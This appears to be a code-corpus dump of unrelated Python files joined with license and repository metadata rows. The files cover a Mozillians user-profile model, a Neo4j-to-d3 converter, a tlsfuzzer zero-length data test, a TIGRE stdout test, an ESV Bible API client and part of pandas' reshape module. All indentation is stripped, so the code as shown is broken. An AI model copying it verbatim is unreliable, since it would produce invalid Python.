kwargs['crop'] = 'center'
if self.photo:
return get_thumbnail(self.photo, geometry, **kwargs)
return get_thumbnail(settings.DEFAULT_AVATAR_PATH, geometry, **kwargs)
def get_photo_url(self, geometry='160x160', **kwargs):
"""Return photo url.
If privacy allows and no photo set, return gravatar link.
If privacy allows and photo set return local photo link.
If privacy doesn't allow return default local link.
"""
if not self.photo and self.privacy_photo >= self._privacy_level:
return gravatar(self.user.email, size=geometry)
return self.get_photo_thumbnail(geometry, **kwargs).url
def vouch(self, vouched_by, commit=True):
if self.is_vouched:
return
self.is_vouched = True
self.vouched_by = vouched_by
self.date_vouched = datetime.now()
if commit:
self.save()
self._email_now_vouched()
def auto_vouch(self):
"""Auto vouch mozilla.com users."""
email = self.user.email
if any(email.endswith('@' + x) for x in settings.AUTO_VOUCH_DOMAINS):
self.vouch(None, commit=False)
def add_to_staff_group(self):
"""Keep users in the staff group if they're autovouchable."""
email = self.user.email
staff, created = Group.objects.get_or_create(name='staff', system=True)
if any(email.endswith('@' + x) for x in
settings.AUTO_VOUCH_DOMAINS):
self.groups.add(staff)
elif staff in self.groups.all():
self.groups.remove(staff)
def _email_now_vouched(self):
"""Email this user, letting them know they are now vouched."""
subject = _(u'You are now vouched on Mozillians!')
message = _(u"You've now been vouched on Mozillians.org. "
"You'll now be able to search, vouch "
"and invite other Mozillians onto the site.")
send_mail(subject, message, settings.FROM_NOREPLY,
[self.user.email])
def save(self, *args, **kwargs):
self._privacy_level = None
self.auto_vouch()
super(UserProfile, self).save(*args, **kwargs)
self.add_to_staff_group()
@classmethod
def get_index(cls, public_index=False):
if public_index:
return settings.ES_INDEXES['public']
return settings.ES_INDEXES['default']
@classmethod
def index(cls, document, id_=None, bulk=False, force_insert=False,
es=None, public_index=False):
""" Overide elasticutils.index() to support more than one index
for UserProfile model.
"""
if bulk and es is None:
raise ValueError('bulk is True, but es is None')
if es is None:
es = get_es()
es.index(document, index=cls.get_index(public_index),
doc_type=cls.get_mapping_type(),
id=id_, bulk=bulk, force_insert=force_insert)
@classmethod
def unindex(cls, id, es=None, public_index=False):
if es is None:
es = get_es()
es.delete(cls.get_index(public_index), cls.get_mapping_type(), id)
@receiver(dbsignals.post_save, sender=User,
dispatch_uid='create_user_profile_sig')
def create_user_profile(sender, instance, created, raw, **kwargs):
if not raw:
up, created = UserProfile.objects.get_or_create(user=instance)
if not created:
dbsignals.post_save.send(sender=UserProfile, instance=up,
created=created, raw=raw)
@receiver(dbsignals.post_save, sender=UserProfile,
dispatch_uid='update_basket_sig')
def update_basket(sender, instance, **kwargs):
update_basket_task.delay(instance.id)
@receiver(dbsignals.post_save, sender=UserProfile,
dispatch_uid='update_search_index_sig')
def update_search_index(sender, instance, **kwargs):
if instance.is_complete:
index_objects.delay(sender, [instance.id], public=False)
if instance.is_public_indexable:
index_objects.delay(sender, [instance.id], public_index=True)
else:
unindex_objects(UserProfile, [instance.id], public_index=True)
@receiver(dbsignals.post_delete, sender=UserProfile,
dispatch_uid='remove_from_search_index_sig')
def remove_from_search_index(sender, instance, **kwargs):
unindex_objects(UserProfile, [instance.id], public_index=False)
unindex_objects(UserProfile, [instance.id], public_index=True)
class UsernameBlacklist(models.Model):
value = models.CharField(max_length=30, unique=True)
is_regex = models.BooleanField(default=False)
def __unicode__(self):
return self.value
class Meta:
ordering = ['value']
| bsd-3-clause | -7,662,934,216,234,882,000 | 36.6 | 79 | 0.583421 | false |
tommilligan/isoprene-pumpjack | isoprene_pumpjack/utils/neo_to_d3.py | 1 | 2463 | #!/usr/bin/env python
'''
Transformation of Neo4J result object into a d3 friendly dictionary.
'''
def dedupe_dict_list(duped, id_prop="id"):
'''Dedupe a list of dicts by a dictionary property'''
deduped = list({v[id_prop]:v for v in duped}.values())
return deduped
def neo_node_to_d3_node(node):
d3node = {
"id": node.id,
"labels": [label for label in node.labels],
"props": {k: v for k, v in node.items()}
}
return d3node
def neo_link_to_d3_link(link):
d3link = {
"id": link.id,
"source": link.start,
"target": link.end,
"labels": [link.type],
"props": {k: v for k, v in link.items()}
}
return d3link
def neo_to_d3(result, nodeLabels=[], linkLabels=[]):
'''
Convert neo results to d3 drawable nodes/links object
Takes
* the neo result (BoltStatementResult)
* a list of node labels (string[])
* a list of link labels (string[])
Dedupes to the standard format:
{
nodes: [
{
id: string,
labels: string[],
properties: {}
}
],
links: [
{
id: string,
source: string, # id of a node
target: string, # id of a node
labels: string[],
properties: {}
}
]
}
'''
d3data = {
"nodes": [],
"links": []
}
process_neo_objects = [
{
"labels": nodeLabels,
"function": neo_node_to_d3_node,
"d3key": "nodes"
},
{
"labels": linkLabels,
"function": neo_link_to_d3_link,
"d3key": "links"
}
]
for record in result:
for process in process_neo_objects:
for label in process["labels"]:
neo_objects = record[label]
if isinstance(neo_objects, list):
for neo_object in neo_objects:
d3object = process["function"](neo_object)
d3data[process["d3key"]].append(d3object)
else:
neo_object = neo_objects
d3object = process["function"](neo_object)
d3data[process["d3key"]].append(d3object)
d3data[process["d3key"]] = dedupe_dict_list(d3data[process["d3key"]], "id")
return d3data
| apache-2.0 | -6,120,799,362,977,779,000 | 25.483871 | 87 | 0.484369 | false |
tomato42/tlsfuzzer | scripts/test-zero-length-data.py | 1 | 6794 | # Author: Hubert Kario, (c) 2015
# Released under Gnu GPL v2.0, see LICENSE file for details
"""Example empty appd data test"""
from __future__ import print_function
import traceback
from random import sample
import sys
import re
import getopt
from tlsfuzzer.runner import Runner
from tlsfuzzer.messages import Connect, ClientHelloGenerator, \
ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \
FinishedGenerator, ApplicationDataGenerator, \
AlertGenerator
from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \
ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \
ExpectAlert, ExpectClose, ExpectApplicationData
from tlslite.constants import CipherSuite, AlertLevel, AlertDescription
from tlsfuzzer.utils.lists import natural_sort_keys
version = 2
def help_msg():
print("Usage: <script-name> [-h hostname] [-p port] [[probe-name] ...]")
print(" -h hostname name of the host to run the test against")
print(" localhost by default")
print(" -p port port number to use for connection, 4433 by default")
print(" -e probe-name exclude the probe from the list of the ones run")
print(" may be specified multiple times")
print(" -n num run 'num' or all(if 0) tests instead of default(all)")
print(" (excluding \"sanity\" tests)")
print(" -x probe-name expect the probe to fail. When such probe passes despite being marked like this")
print(" it will be reported in the test summary and the whole script will fail.")
print(" May be specified multiple times.")
print(" -X message expect the `message` substring in exception raised during")
print(" execution of preceding expected failure probe")
print(" usage: [-x probe-name] [-X exception], order is compulsory!")
print(" --help this message")
def main():
"""check if app data records with zero payload are accepted by server"""
conversations = {}
host = "localhost"
port = 4433
num_limit = None
run_exclude = set()
expected_failures = {}
last_exp_tmp = None
argv = sys.argv[1:]
opts, argv = getopt.getopt(argv, "h:p:e:n:x:X:", ["help"])
for opt, arg in opts:
if opt == '-h':
host = arg
elif opt == '-p':
port = int(arg)
elif opt == '--help':
help_msg()
sys.exit(0)
elif opt == '-e':
run_exclude.add(arg)
elif opt == '-n':
num_limit = int(arg)
elif opt == '-x':
expected_failures[arg] = None
last_exp_tmp = str(arg)
elif opt == '-X':
if not last_exp_tmp:
raise ValueError("-x has to be specified before -X")
expected_failures[last_exp_tmp] = str(arg)
else:
raise ValueError("Unknown option: {0}".format(opt))
if argv:
help_msg()
raise ValueError("Unknown options: {0}".format(argv))
conversation = Connect(host, port)
node = conversation
ciphers = [CipherSuite.TLS_RSA_WITH_AES_128_CBC_SHA,
CipherSuite.TLS_EMPTY_RENEGOTIATION_INFO_SCSV]
node = node.add_child(ClientHelloGenerator(ciphers))
node = node.add_child(ExpectServerHello())
node = node.add_child(ExpectCertificate())
node = node.add_child(ExpectServerHelloDone())
node = node.add_child(ClientKeyExchangeGenerator())
node = node.add_child(ChangeCipherSpecGenerator())
node = node.add_child(FinishedGenerator())
node = node.add_child(ExpectChangeCipherSpec())
node = node.add_child(ExpectFinished())
node = node.add_child(ApplicationDataGenerator(bytearray(0)))
text = b"GET / HTTP/1.0\nX-bad: aaaa\n\n"
node = node.add_child(ApplicationDataGenerator(text))
node = node.add_child(ExpectApplicationData())
node = node.add_child(AlertGenerator(AlertLevel.warning,
AlertDescription.close_notify))
node = node.add_child(ExpectAlert(AlertLevel.warning,
AlertDescription.close_notify))
node.next_sibling = ExpectClose()
node = node.add_child(ExpectClose())
conversations["zero-length app data"] = \
conversation
# run the conversation
good = 0
bad = 0
xfail = 0
xpass = 0
failed = []
xpassed = []
if not num_limit:
num_limit = len(conversations)
sampled_tests = sample(list(conversations.items()), len(conversations))
for c_name, conversation in sampled_tests:
if c_name in run_exclude:
continue
print("{0} ...".format(c_name))
runner = Runner(conversation)
res = True
exception = None
#because we don't want to abort the testing and we are reporting
#the errors to the user, using a bare except is OK
#pylint: disable=bare-except
try:
runner.run()
except Exception as exp:
exception = exp
print("Error while processing")
print(traceback.format_exc())
res = False
#pylint: enable=bare-except
if c_name in expected_failures:
if res:
xpass += 1
xpassed.append(c_name)
print("XPASS-expected failure but test passed\n")
else:
if expected_failures[c_name] is not None and \
expected_failures[c_name] not in str(exception):
bad += 1
failed.append(c_name)
print("Expected error message: {0}\n"
.format(expected_failures[c_name]))
else:
xfail += 1
print("OK-expected failure\n")
else:
if res:
good+=1
print("OK")
else:
bad+=1
print("Test end")
print(20 * '=')
print("version: {0}".format(version))
print(20 * '=')
print("TOTAL: {0}".format(len(sampled_tests)))
print("SKIP: {0}".format(len(run_exclude.intersection(conversations.keys()))))
print("PASS: {0}".format(good))
print("XFAIL: {0}".format(xfail))
print("FAIL: {0}".format(bad))
print("XPASS: {0}".format(xpass))
print(20 * '=')
sort = sorted(xpassed ,key=natural_sort_keys)
if len(sort):
print("XPASSED:\n\t{0}".format('\n\t'.join(repr(i) for i in sort)))
sort = sorted(failed, key=natural_sort_keys)
if len(sort):
print("FAILED:\n\t{0}".format('\n\t'.join(repr(i) for i in sort)))
if bad > 0:
sys.exit(1)
if __name__ == "__main__":
main()
| gpl-2.0 | 8,951,013,126,996,592,000 | 35.724324 | 108 | 0.583898 | false |
fifengine/fifengine-demos | rpg/scripts/misc/serializer.py | 1 | 1203 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ####################################################################
# Copyright (C) 2005-2013 by the FIFE team
# http://www.fifengine.net
# This file is part of FIFE.
#
# FIFE is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# ####################################################################
from builtins import object
class Serializer(object):
def __init__(self):
return
def serialize(self):
pass
def deserialize(self, valuedict=None):
pass
| lgpl-2.1 | -224,521,764,962,530,180 | 30.657895 | 70 | 0.637573 | false |
CERN/TIGRE | Python/tests/stdout_test.py | 1 | 1107 | import StringIO
import os
import sys
import unittest
import numpy as np
import tigre
import tigre.algorithms as algs
from tigre.demos.Test_data import data_loader
dirname = os.path.dirname(__file__)
class TestStdout(unittest.TestCase):
pass
def test_generator(algorithm, proj, geo, angles, niter):
def test(self):
capturedOutput = StringIO.StringIO()
sys.stdout = capturedOutput
getattr(algs, algorithm)(proj, geo, angles, niter=niter, verbose=False)
self.assertIs(capturedOutput.getvalue(), "")
sys.stdout = sys.__stdout__
return test
if __name__ == "__main__":
geo = tigre.geometry(mode="cone", default=True, high_quality=False)
print(geo)
true_img = data_loader.load_head_phantom(geo.nVoxel)
angles = np.linspace(0, 2 * np.pi, 100)
niter = 5
proj = tigre.Ax(true_img, geo, angles)
for alg in algs.__all__:
if alg != "fbp":
test_name = "test_print_%s" % (alg)
test = test_generator(alg, proj, geo, angles, niter)
setattr(TestStdout, test_name, test)
unittest.main()
| bsd-3-clause | -336,089,485,312,780,740 | 24.744186 | 79 | 0.641373 | false |
mintchaos/django_esv | esv/__init__.py | 1 | 1497 | import urllib
import httplib2
from django.conf import settings
class EsvClientError(Exception):
pass
class PassageNotFoundError(EsvClientError):
pass
class EsvQuotaExceededError(EsvClientError):
pass
class EsvClient(object):
def __init__(self, key='IP'):
http_cache = getattr(settings, 'ESV_HTTP_CACHE', '/tmp/esv_http_cache')
self.http = httplib2.Http(http_cache)
self.key = key
self._cache = {}
def get_passage(self, passage, headings=False, audio=True, footnotes=False, audio_format="flash"):
params_dict = {
'passage': passage,
'include-headings': headings,
'include_footnotes': footnotes,
'include-word-ids': False,
'include-first-verse-numbers': False,
'include-audio-link': audio,
'audio-format': audio_format,
}
params = urllib.urlencode(params_dict).lower()
# TODO: Check cache here
resp, content = self.http.request("http://www.esvapi.org/v2/rest/passageQuery?key=%s&%s" % (self.key, params), "GET")
if content.startswith("ERROR"):
if content.lower().find('no results found') > 0:
raise PassageNotFoundError
if content.lower().find('you have exceeded your quota') > 0:
raise EsvQuotaExceededError
raise EsvClientError
# TODO: Set cache here
return content
# main instance of the esv client
esv = EsvClient() | bsd-3-clause | 5,610,947,664,951,156,000 | 31.565217 | 125 | 0.613894 | false |
MJuddBooth/pandas | pandas/core/reshape/reshape.py | 1 | 36628 | # pylint: disable=E1101,E1103
# pylint: disable=W0703,W0622,W0613,W0201
from functools import partial
import itertools
import numpy as np
from pandas._libs import algos as _algos, reshape as _reshape
from pandas._libs.sparse import IntIndex
from pandas.compat import PY2, range, text_type, u, zip
from pandas.core.dtypes.cast import maybe_promote
from pandas.core.dtypes.common import (
ensure_platform_int, is_bool_dtype, is_extension_array_dtype,
is_integer_dtype, is_list_like, is_object_dtype, needs_i8_conversion)
from pandas.core.dtypes.missing import notna
from pandas import compat
import pandas.core.algorithms as algos
from pandas.core.arrays import SparseArray
from pandas.core.arrays.categorical import _factorize_from_iterable
from pandas.core.frame import DataFrame
from pandas.core.index import Index, MultiIndex
from pandas.core.internals.arrays import extract_array
from pandas.core.series import Series
from pandas.core.sorting import (
compress_group_index, decons_obs_group_ids, get_compressed_ids,
get_group_index)
class _Unstacker(object):
"""
Helper class to unstack data / pivot with multi-level index
Parameters
----------
values : ndarray
Values of DataFrame to "Unstack"
index : object
Pandas ``Index``
level : int or str, default last level
Level to "unstack". Accepts a name for the level.
value_columns : Index, optional
Pandas ``Index`` or ``MultiIndex`` object if unstacking a DataFrame
fill_value : scalar, optional
Default value to fill in missing values if subgroups do not have the
same set of labels. By default, missing values will be replaced with
the default fill value for that data type, NaN for float, NaT for
datetimelike, etc. For integer types, by default data will converted to
float and missing values will be set to NaN.
constructor : object
Pandas ``DataFrame`` or subclass used to create unstacked
response. If None, DataFrame or SparseDataFrame will be used.
Examples
--------
>>> index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'),
... ('two', 'a'), ('two', 'b')])
>>> s = pd.Series(np.arange(1, 5, dtype=np.int64), index=index)
>>> s
one a 1
b 2
two a 3
b 4
dtype: int64
>>> s.unstack(level=-1)
a b
one 1 2
two 3 4
>>> s.unstack(level=0)
one two
a 1 3
b 2 4
Returns
-------
unstacked : DataFrame
"""
def __init__(self, values, index, level=-1, value_columns=None,
fill_value=None, constructor=None):
if values.ndim == 1:
values = values[:, np.newaxis]
self.values = values
self.value_columns = value_columns
self.fill_value = fill_value
if constructor is None:
constructor = DataFrame
self.constructor = constructor
if value_columns is None and values.shape[1] != 1: # pragma: no cover
raise ValueError('must pass column labels for multi-column data')
self.index = index.remove_unused_levels()
self.level = self.index._get_level_number(level)
# when index includes `nan`, need to lift levels/strides by 1
self.lift = 1 if -1 in self.index.codes[self.level] else 0
self.new_index_levels = list(self.index.levels)
self.new_index_names = list(self.index.names)
self.removed_name = self.new_index_names.pop(self.level)
self.removed_level = self.new_index_levels.pop(self.level)
self.removed_level_full = index.levels[self.level]
# Bug fix GH 20601
# If the data frame is too big, the number of unique index combination
# will cause int32 overflow on windows environments.
# We want to check and raise an error before this happens
num_rows = np.max([index_level.size for index_level
in self.new_index_levels])
num_columns = self.removed_level.size
# GH20601: This forces an overflow if the number of cells is too high.
num_cells = np.multiply(num_rows, num_columns, dtype=np.int32)
if num_rows > 0 and num_columns > 0 and num_cells <= 0:
raise ValueError('Unstacked DataFrame is too big, '
'causing int32 overflow')
self._make_sorted_values_labels()
self._make_selectors()
def _make_sorted_values_labels(self):
v = self.level
codes = list(self.index.codes)
levs = list(self.index.levels)
to_sort = codes[:v] + codes[v + 1:] + [codes[v]]
sizes = [len(x) for x in levs[:v] + levs[v + 1:] + [levs[v]]]
comp_index, obs_ids = get_compressed_ids(to_sort, sizes)
ngroups = len(obs_ids)
indexer = _algos.groupsort_indexer(comp_index, ngroups)[0]
indexer = ensure_platform_int(indexer)
self.sorted_values = algos.take_nd(self.values, indexer, axis=0)
self.sorted_labels = [l.take(indexer) for l in to_sort]
def _make_selectors(self):
new_levels = self.new_index_levels
# make the mask
remaining_labels = self.sorted_labels[:-1]
level_sizes = [len(x) for x in new_levels]
comp_index, obs_ids = get_compressed_ids(remaining_labels, level_sizes)
ngroups = len(obs_ids)
comp_index = ensure_platform_int(comp_index)
stride = self.index.levshape[self.level] + self.lift
self.full_shape = ngroups, stride
selector = self.sorted_labels[-1] + stride * comp_index + self.lift
mask = np.zeros(np.prod(self.full_shape), dtype=bool)
mask.put(selector, True)
if mask.sum() < len(self.index):
raise ValueError('Index contains duplicate entries, '
'cannot reshape')
self.group_index = comp_index
self.mask = mask
self.unique_groups = obs_ids
self.compressor = comp_index.searchsorted(np.arange(ngroups))
def get_result(self):
values, _ = self.get_new_values()
columns = self.get_new_columns()
index = self.get_new_index()
return self.constructor(values, index=index, columns=columns)
def get_new_values(self):
values = self.values
# place the values
length, width = self.full_shape
stride = values.shape[1]
result_width = width * stride
result_shape = (length, result_width)
mask = self.mask
mask_all = mask.all()
# we can simply reshape if we don't have a mask
if mask_all and len(values):
new_values = (self.sorted_values
.reshape(length, width, stride)
.swapaxes(1, 2)
.reshape(result_shape)
)
new_mask = np.ones(result_shape, dtype=bool)
return new_values, new_mask
# if our mask is all True, then we can use our existing dtype
if mask_all:
dtype = values.dtype
new_values = np.empty(result_shape, dtype=dtype)
else:
dtype, fill_value = maybe_promote(values.dtype, self.fill_value)
new_values = np.empty(result_shape, dtype=dtype)
new_values.fill(fill_value)
new_mask = np.zeros(result_shape, dtype=bool)
name = np.dtype(dtype).name
sorted_values = self.sorted_values
# we need to convert to a basic dtype
# and possibly coerce an input to our output dtype
# e.g. ints -> floats
if needs_i8_conversion(values):
sorted_values = sorted_values.view('i8')
new_values = new_values.view('i8')
name = 'int64'
elif is_bool_dtype(values):
sorted_values = sorted_values.astype('object')
new_values = new_values.astype('object')
name = 'object'
else:
sorted_values = sorted_values.astype(name, copy=False)
# fill in our values & mask
f = getattr(_reshape, "unstack_{name}".format(name=name))
f(sorted_values,
mask.view('u1'),
stride,
length,
width,
new_values,
new_mask.view('u1'))
# reconstruct dtype if needed
if needs_i8_conversion(values):
new_values = new_values.view(values.dtype)
return new_values, new_mask
def get_new_columns(self):
if self.value_columns is None:
if self.lift == 0:
return self.removed_level
lev = self.removed_level
return lev.insert(0, lev._na_value)
stride = len(self.removed_level) + self.lift
width = len(self.value_columns)
propagator = np.repeat(np.arange(width), stride)
if isinstance(self.value_columns, MultiIndex):
new_levels = self.value_columns.levels + (self.removed_level_full,)
new_names = self.value_columns.names + (self.removed_name,)
new_codes = [lab.take(propagator)
for lab in self.value_columns.codes]
else:
new_levels = [self.value_columns, self.removed_level_full]
new_names = [self.value_columns.name, self.removed_name]
new_codes = [propagator]
# The two indices differ only if the unstacked level had unused items:
if len(self.removed_level_full) != len(self.removed_level):
# In this case, we remap the new codes to the original level:
repeater = self.removed_level_full.get_indexer(self.removed_level)
if self.lift:
repeater = np.insert(repeater, 0, -1)
else:
# Otherwise, we just use each level item exactly once:
repeater = np.arange(stride) - self.lift
# The entire level is then just a repetition of the single chunk:
new_codes.append(np.tile(repeater, width))
return MultiIndex(levels=new_levels, codes=new_codes,
names=new_names, verify_integrity=False)
def get_new_index(self):
result_codes = [lab.take(self.compressor)
for lab in self.sorted_labels[:-1]]
# construct the new index
if len(self.new_index_levels) == 1:
lev, lab = self.new_index_levels[0], result_codes[0]
if (lab == -1).any():
lev = lev.insert(len(lev), lev._na_value)
return lev.take(lab)
return MultiIndex(levels=self.new_index_levels, codes=result_codes,
names=self.new_index_names, verify_integrity=False)
def _unstack_multiple(data, clocs, fill_value=None):
if len(clocs) == 0:
return data
# NOTE: This doesn't deal with hierarchical columns yet
index = data.index
clocs = [index._get_level_number(i) for i in clocs]
rlocs = [i for i in range(index.nlevels) if i not in clocs]
clevels = [index.levels[i] for i in clocs]
ccodes = [index.codes[i] for i in clocs]
cnames = [index.names[i] for i in clocs]
rlevels = [index.levels[i] for i in rlocs]
rcodes = [index.codes[i] for i in rlocs]
rnames = [index.names[i] for i in rlocs]
shape = [len(x) for x in clevels]
group_index = get_group_index(ccodes, shape, sort=False, xnull=False)
comp_ids, obs_ids = compress_group_index(group_index, sort=False)
recons_codes = decons_obs_group_ids(comp_ids, obs_ids, shape, ccodes,
xnull=False)
if rlocs == []:
# Everything is in clocs, so the dummy df has a regular index
dummy_index = Index(obs_ids, name='__placeholder__')
else:
dummy_index = MultiIndex(levels=rlevels + [obs_ids],
codes=rcodes + [comp_ids],
names=rnames + ['__placeholder__'],
verify_integrity=False)
if isinstance(data, Series):
dummy = data.copy()
dummy.index = dummy_index
unstacked = dummy.unstack('__placeholder__', fill_value=fill_value)
new_levels = clevels
new_names = cnames
new_codes = recons_codes
else:
if isinstance(data.columns, MultiIndex):
result = data
for i in range(len(clocs)):
val = clocs[i]
result = result.unstack(val)
clocs = [v if i > v else v - 1 for v in clocs]
return result
dummy = data.copy()
dummy.index = dummy_index
unstacked = dummy.unstack('__placeholder__', fill_value=fill_value)
if isinstance(unstacked, Series):
unstcols = unstacked.index
else:
unstcols = unstacked.columns
new_levels = [unstcols.levels[0]] + clevels
new_names = [data.columns.name] + cnames
new_codes = [unstcols.codes[0]]
for rec in recons_codes:
new_codes.append(rec.take(unstcols.codes[-1]))
new_columns = MultiIndex(levels=new_levels, codes=new_codes,
names=new_names, verify_integrity=False)
if isinstance(unstacked, Series):
unstacked.index = new_columns
else:
unstacked.columns = new_columns
return unstacked
def unstack(obj, level, fill_value=None):
if isinstance(level, (tuple, list)):
if len(level) != 1:
# _unstack_multiple only handles MultiIndexes,
# and isn't needed for a single level
return _unstack_multiple(obj, level, fill_value=fill_value)
else:
level = level[0]
if isinstance(obj, DataFrame):
if isinstance(obj.index, MultiIndex):
return _unstack_frame(obj, level, fill_value=fill_value)
else:
return obj.T.stack(dropna=False)
else:
if is_extension_array_dtype(obj.dtype):
return _unstack_extension_series(obj, level, fill_value)
unstacker = _Unstacker(obj.values, obj.index, level=level,
fill_value=fill_value,
constructor=obj._constructor_expanddim)
return unstacker.get_result()
def _unstack_frame(obj, level, fill_value=None):
if obj._is_mixed_type:
unstacker = partial(_Unstacker, index=obj.index,
level=level, fill_value=fill_value)
blocks = obj._data.unstack(unstacker,
fill_value=fill_value)
return obj._constructor(blocks)
else:
unstacker = _Unstacker(obj.values, obj.index, level=level,
value_columns=obj.columns,
fill_value=fill_value,
constructor=obj._constructor)
return unstacker.get_result()
def _unstack_extension_series(series, level, fill_value):
"""
Unstack an ExtensionArray-backed Series.
The ExtensionDtype is preserved.
Parameters
----------
series : Series
A Series with an ExtensionArray for values
level : Any
The level name or number.
fill_value : Any
The user-level (not physical storage) fill value to use for
missing values introduced by the reshape. Passed to
``series.values.take``.
Returns
-------
DataFrame
Each column of the DataFrame will have the same dtype as
the input Series.
"""
# Implementation note: the basic idea is to
# 1. Do a regular unstack on a dummy array of integers
# 2. Followup with a columnwise take.
# We use the dummy take to discover newly-created missing values
# introduced by the reshape.
from pandas.core.reshape.concat import concat
dummy_arr = np.arange(len(series))
# fill_value=-1, since we will do a series.values.take later
result = _Unstacker(dummy_arr, series.index,
level=level, fill_value=-1).get_result()
out = []
values = extract_array(series, extract_numpy=False)
for col, indices in result.iteritems():
out.append(Series(values.take(indices.values,
allow_fill=True,
fill_value=fill_value),
name=col, index=result.index))
return concat(out, axis='columns', copy=False, keys=result.columns)
def stack(frame, level=-1, dropna=True):
"""
Convert DataFrame to Series with multi-level Index. Columns become the
second level of the resulting hierarchical index
Returns
-------
stacked : Series
"""
def factorize(index):
if index.is_unique:
return index, np.arange(len(index))
codes, categories = _factorize_from_iterable(index)
return categories, codes
N, K = frame.shape
# Will also convert negative level numbers and check if out of bounds.
level_num = frame.columns._get_level_number(level)
if isinstance(frame.columns, MultiIndex):
return _stack_multi_columns(frame, level_num=level_num, dropna=dropna)
elif isinstance(frame.index, MultiIndex):
new_levels = list(frame.index.levels)
new_codes = [lab.repeat(K) for lab in frame.index.codes]
clev, clab = factorize(frame.columns)
new_levels.append(clev)
new_codes.append(np.tile(clab, N).ravel())
new_names = list(frame.index.names)
new_names.append(frame.columns.name)
new_index = MultiIndex(levels=new_levels, codes=new_codes,
names=new_names, verify_integrity=False)
else:
levels, (ilab, clab) = zip(*map(factorize, (frame.index,
frame.columns)))
codes = ilab.repeat(K), np.tile(clab, N).ravel()
new_index = MultiIndex(levels=levels, codes=codes,
names=[frame.index.name, frame.columns.name],
verify_integrity=False)
if frame._is_homogeneous_type:
# For homogeneous EAs, frame.values will coerce to object. So
# we concatenate instead.
dtypes = list(frame.dtypes.values)
dtype = dtypes[0]
if is_extension_array_dtype(dtype):
arr = dtype.construct_array_type()
new_values = arr._concat_same_type([
col._values for _, col in frame.iteritems()
])
new_values = _reorder_for_extension_array_stack(new_values, N, K)
else:
# homogeneous, non-EA
new_values = frame.values.ravel()
else:
# non-homogeneous
new_values = frame.values.ravel()
if dropna:
mask = notna(new_values)
new_values = new_values[mask]
new_index = new_index[mask]
return frame._constructor_sliced(new_values, index=new_index)
def stack_multiple(frame, level, dropna=True):
# If all passed levels match up to column names, no
# ambiguity about what to do
if all(lev in frame.columns.names for lev in level):
result = frame
for lev in level:
result = stack(result, lev, dropna=dropna)
# Otherwise, level numbers may change as each successive level is stacked
elif all(isinstance(lev, int) for lev in level):
# As each stack is done, the level numbers decrease, so we need
# to account for that when level is a sequence of ints
result = frame
# _get_level_number() checks level numbers are in range and converts
# negative numbers to positive
level = [frame.columns._get_level_number(lev) for lev in level]
# Can't iterate directly through level as we might need to change
# values as we go
for index in range(len(level)):
lev = level[index]
result = stack(result, lev, dropna=dropna)
# Decrement all level numbers greater than current, as these
# have now shifted down by one
updated_level = []
for other in level:
if other > lev:
updated_level.append(other - 1)
else:
updated_level.append(other)
level = updated_level
else:
raise ValueError("level should contain all level names or all level "
"numbers, not a mixture of the two.")
return result
def _stack_multi_columns(frame, level_num=-1, dropna=True):
def _convert_level_number(level_num, columns):
"""
Logic for converting the level number to something we can safely pass
to swaplevel:
We generally want to convert the level number into a level name, except
when columns do not have names, in which case we must leave as a level
number
"""
if level_num in columns.names:
return columns.names[level_num]
else:
if columns.names[level_num] is None:
return level_num
else:
return columns.names[level_num]
this = frame.copy()
# this makes life much simpler
if level_num != frame.columns.nlevels - 1:
# roll levels to put selected level at end
roll_columns = this.columns
for i in range(level_num, frame.columns.nlevels - 1):
# Need to check if the ints conflict with level names
lev1 = _convert_level_number(i, roll_columns)
lev2 = _convert_level_number(i + 1, roll_columns)
roll_columns = roll_columns.swaplevel(lev1, lev2)
this.columns = roll_columns
if not this.columns.is_lexsorted():
# Workaround the edge case where 0 is one of the column names,
# which interferes with trying to sort based on the first
# level
level_to_sort = _convert_level_number(0, this.columns)
this = this.sort_index(level=level_to_sort, axis=1)
# tuple list excluding level for grouping columns
if len(frame.columns.levels) > 2:
tuples = list(zip(*[lev.take(level_codes) for lev, level_codes
in zip(this.columns.levels[:-1],
this.columns.codes[:-1])]))
unique_groups = [key for key, _ in itertools.groupby(tuples)]
new_names = this.columns.names[:-1]
new_columns = MultiIndex.from_tuples(unique_groups, names=new_names)
else:
new_columns = unique_groups = this.columns.levels[0]
# time to ravel the values
new_data = {}
level_vals = this.columns.levels[-1]
level_codes = sorted(set(this.columns.codes[-1]))
level_vals_used = level_vals[level_codes]
levsize = len(level_codes)
drop_cols = []
for key in unique_groups:
try:
loc = this.columns.get_loc(key)
except KeyError:
drop_cols.append(key)
continue
# can make more efficient?
# we almost always return a slice
# but if unsorted can get a boolean
# indexer
if not isinstance(loc, slice):
slice_len = len(loc)
else:
slice_len = loc.stop - loc.start
if slice_len != levsize:
chunk = this.loc[:, this.columns[loc]]
chunk.columns = level_vals.take(chunk.columns.codes[-1])
value_slice = chunk.reindex(columns=level_vals_used).values
else:
if (frame._is_homogeneous_type and
is_extension_array_dtype(frame.dtypes.iloc[0])):
dtype = this[this.columns[loc]].dtypes.iloc[0]
subset = this[this.columns[loc]]
value_slice = dtype.construct_array_type()._concat_same_type(
[x._values for _, x in subset.iteritems()]
)
N, K = this.shape
idx = np.arange(N * K).reshape(K, N).T.ravel()
value_slice = value_slice.take(idx)
elif frame._is_mixed_type:
value_slice = this[this.columns[loc]].values
else:
value_slice = this.values[:, loc]
if value_slice.ndim > 1:
# i.e. not extension
value_slice = value_slice.ravel()
new_data[key] = value_slice
if len(drop_cols) > 0:
new_columns = new_columns.difference(drop_cols)
N = len(this)
if isinstance(this.index, MultiIndex):
new_levels = list(this.index.levels)
new_names = list(this.index.names)
new_codes = [lab.repeat(levsize) for lab in this.index.codes]
else:
new_levels = [this.index]
new_codes = [np.arange(N).repeat(levsize)]
